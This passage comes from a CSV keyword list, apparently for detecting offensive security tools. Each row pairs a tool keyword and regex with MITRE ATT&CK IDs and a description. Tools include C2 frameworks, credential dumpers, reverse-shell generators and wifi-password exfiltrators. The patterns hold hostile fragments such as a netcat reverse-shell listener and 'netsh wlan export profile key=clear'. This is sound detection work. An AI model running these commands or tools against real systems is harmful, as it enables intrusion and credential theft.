- T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","0","N/A","10","10","1316","422","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" "*stop-keystrokes*",".{0,1000}stop\-keystrokes.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - 
T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*stormshadow07*",".{0,1000}stormshadow07.{0,1000}","offensive_tool_keyword","HackTheWorld","An Python Script For Generating Payloads that Bypasses All Antivirus so far","T1566 - T1106 - T1027 - T1059 - T1070","TA0002 - TA0005 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/stormshadow07/HackTheWorld","1","1","N/A","N/A","10","913","174","2024-01-19T12:11:39Z","2018-02-17T11:46:40Z" "*Stowaway/admin/process*",".{0,1000}Stowaway\/admin\/process.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*STRING firefox about:logins*",".{0,1000}STRING\sfirefox\sabout\:logins.{0,1000}","offensive_tool_keyword","Harvester_OF_SORROW","The payload opens firefox about:logins and tabs and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. 
Finally it sends the screenshot to an email of your choosing.","T1056.001 - T1113 - T1512 - T1566.001 - T1059.006","TA0004 - TA0009 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*string maliciousCommand =*",".{0,1000}string\smaliciousCommand\s\=.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","0","N/A","9","1","96","16","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z" "*String netsh wlan export profile key=clear*",".{0,1000}String\snetsh\swlan\sexport\sprofile\skey\=clear.{0,1000}","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*strip_bof.ps1*",".{0,1000}strip_bof\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - 
T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","247","48","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" "*strip2john.py*",".{0,1000}strip2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*strip-bof -Path *",".{0,1000}strip\-bof\s\-Path\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - 
Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","0","N/A","10","10","247","48","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" "*StrongLoader_x64.exe*",".{0,1000}StrongLoader_x64\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*struct sockaddr_in revsockaddr*",".{0,1000}struct\ssockaddr_in\srevsockaddr.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*struts_ext_v2.jar*",".{0,1000}struts_ext_v2\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*stty raw -echo; (stty size; cat) | nc -lvnp*",".{0,1000}stty\sraw\s\-echo\;\s\(stty\ssize\;\scat\)\s\|\snc\s\-lvnp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*su rootz*",".{0,1000}su\srootz.{0,1000}","offensive_tool_keyword","POC","POC 
exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ahrixia/CVE_2022_0847","1","0","N/A","N/A","1","22","15","2022-03-08T13:15:35Z","2022-03-08T12:43:43Z" "*su_brute_user_num*",".{0,1000}su_brute_user_num.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*subbrute*",".{0,1000}subbrute.{0,1000}","offensive_tool_keyword","subbrute","SubBrute is a community driven project with the goal of creating the fastest. and most accurate subdomain enumeration tool. Some of the magic behind SubBrute is that it uses open resolvers as a kind of proxy to circumvent DNS rate-limiting. This design also provides a layer of anonymity. 
as SubBrute does not send traffic directly to the targets name servers.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/TheRook/subbrute","1","1","N/A","N/A","10","3250","647","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z" "*subdomain_takeovers.py*",".{0,1000}subdomain_takeovers\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*subdomain-enumeration.py*",".{0,1000}subdomain\-enumeration\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*subdomains-100.txt*",".{0,1000}subdomains\-100\.txt.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","1076","410","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "*subdomains-1000.txt*",".{0,1000}subdomains\-1000\.txt.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","1076","410","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "*subdomains-10000.txt*",".{0,1000}subdomains\-10000\.txt.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - 
TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","1076","410","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "*subdomains-500.txt*",".{0,1000}subdomains\-500\.txt.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","1076","410","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "*subdomains-top1million-110000.txt*",".{0,1000}subdomains\-top1million\-110000\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*subdomains-top1million-110000.txt*",".{0,1000}subdomains\-top1million\-110000\.txt.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*subdomains-top1million-20000.txt*",".{0,1000}subdomains\-top1million\-20000\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*subdomains-uk-1000.txt*",".{0,1000}subdomains\-uk\-1000\.txt.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - 
TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","1076","410","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "*subdomains-uk-500.txt*",".{0,1000}subdomains\-uk\-500\.txt.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","1076","410","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "*subdomain-wordlist.txt*",".{0,1000}subdomain\-wordlist\.txt.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*subfinder -d *",".{0,1000}subfinder\s\-d\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*subfinder -silent -d *",".{0,1000}subfinder\s\-silent\s\-d\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*subfinder --silent*",".{0,1000}subfinder\s\-\-silent.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - 
TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*subfinder*",".{0,1000}subfinder.{0,1000}","offensive_tool_keyword","subfinder","SubFinder is a subdomain discovery tool that discovers valid subdomains for any target using passive online sources.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/subfinder/subfinder","1","0","N/A","N/A","10","9361","1195","2024-04-30T17:27:06Z","2018-03-31T09:44:57Z" "*sublist3r -v -d *",".{0,1000}sublist3r\s\-v\s\-d\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Sublist3r*",".{0,1000}Sublist3r.{0,1000}","offensive_tool_keyword","Sublist3r","Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google. Yahoo. Bing. Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft. Virustotal. ThreatCrowd. DNSdumpster and ReverseDNS. subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. 
The credit goes to TheRook who is the author of subbrute.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/aboul3la/Sublist3r","1","1","N/A","N/A","10","9257","2049","2024-01-30T20:29:45Z","2015-12-15T00:55:25Z" "*Suborner.exe*",".{0,1000}Suborner\.exe.{0,1000}","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","1","N/A","N/A","5","463","60","2022-09-02T09:04:46Z","2022-04-26T00:12:58Z" "*Suborner-master.zip*",".{0,1000}Suborner\-master\.zip.{0,1000}","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","1","N/A","N/A","5","463","60","2022-09-02T09:04:46Z","2022-04-26T00:12:58Z" "*succesfully dumped SAM's hash.es to *",".{0,1000}succesfully\sdumped\sSAM\'s\shash\.es\sto\s.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). 
Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","N/A","10","1","56","3","2024-04-19T17:11:22Z","2024-03-05T00:00:20Z" "*succesfully dumped WINHELLO pin.s to *",".{0,1000}succesfully\sdumped\sWINHELLO\spin\.s\sto\s.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","N/A","10","1","56","3","2024-04-19T17:11:22Z","2024-03-05T00:00:20Z" "*Successfully cloned GPO * from SYSVOL*",".{0,1000}Successfully\scloned\sGPO\s.{0,1000}\sfrom\sSYSVOL.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*Successfully connected to sliver listener*",".{0,1000}Successfully\sconnected\sto\ssliver\slistener.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*Successfully connected* spawning shell?*",".{0,1000}Successfully\sconnected.{0,1000}\sspawning\sshell\?.{0,1000}","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via 
named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral Movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","8","2","110","14","2023-11-09T10:36:23Z","2023-08-25T15:18:30Z" "*Successfully cracked account password*",".{0,1000}Successfully\scracked\saccount\spassword.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*Successfully deleted scheduled task *",".{0,1000}Successfully\sdeleted\sscheduled\stask\s.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. 
- BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "*Successfully dumped SAM and SYSTEM*",".{0,1000}Successfully\sdumped\sSAM\sand\sSYSTEM.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","10","1","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z" "*Successfully embedded EXE into GIF*",".{0,1000}Successfully\sembedded\sEXE\sinto\sGIF.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","0","N/A","10","5","436","44","2024-05-01T17:23:14Z","2024-01-10T08:04:57Z" "*Successfully embedded EXE into PNG*",".{0,1000}Successfully\sembedded\sEXE\sinto\sPNG.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. 
The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","0","N/A","10","5","436","44","2024-05-01T17:23:14Z","2024-01-10T08:04:57Z" "*Successfully installed wraith to run on startup *",".{0,1000}Successfully\sinstalled\swraith\sto\srun\son\sstartup\s.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*sudo ./dnsstager*",".{0,1000}sudo\s\.\/dnsstager.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","10","6","598","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z" "*sudo ./recv -f *",".{0,1000}sudo\s\.\/recv\s\-f\s.{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/evallen/ntpescape","1","0","N/A","10","2","130","16","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z" "*sudo ./startup.sh*",".{0,1000}sudo\s\.\/startup\.sh.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & 
Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","9","7","N/A","N/A","N/A","N/A" "*sudo bloodhound*",".{0,1000}sudo\sbloodhound.{0,1000}","offensive_tool_keyword","bloodhound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*sudo iodine *",".{0,1000}sudo\siodine\s.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*sudo -nS id' && lse_sudo=true*",".{0,1000}sudo\s\-nS\sid\'\s\&\&\slse_sudo\=true.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*sudo socat -v TCP-LISTEN:135*rogueOxidResolverPort*",".{0,1000}sudo\ssocat\s\-v\sTCP\-LISTEN\:135.{0,1000}rogueOxidResolverPort.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*sudo tmux new -s icebreaker*",".{0,1000}sudo\stmux\snew\s\-s\sicebreaker.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*sudo_inject*",".{0,1000}sudo_inject.{0,1000}","offensive_tool_keyword","sudo_inject","Privilege Escalation by injecting process possessing sudo tokens Inject process that have valid sudo token and activate our own sudo token","T1055 - T1548.001 - T1059.002","TA0002 - TA0004 - TA0006","N/A","N/A","Exploitation 
tools","https://github.com/nongiach/sudo_inject","1","1","N/A","N/A","7","672","120","2019-04-14T07:43:35Z","2019-03-24T22:06:22Z" "*SUDO_KILLER*",".{0,1000}SUDO_KILLER.{0,1000}","offensive_tool_keyword","SUDO_KILLER","sudo exploitation #Abusing sudo #Exploiting Sudo #Linux Privilege Escalation #OSCP If you like the tool and for my personal motivation so as to develop other tools please a +1 star The tool can be used by pentesters. system admins. CTF players. students. System Auditors and trolls :).","T1078 - T1059 - T1204","TA0002 - TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/TH3xACE/SUDO_KILLER","1","1","N/A","N/A","10","2096","245","2024-03-13T16:20:42Z","2018-12-07T21:08:02Z" "*sudomy.git*",".{0,1000}sudomy\.git.{0,1000}","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1853","366","2024-02-19T14:38:48Z","2019-07-26T10:26:34Z" "*sudopwn.c*",".{0,1000}sudopwn\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege 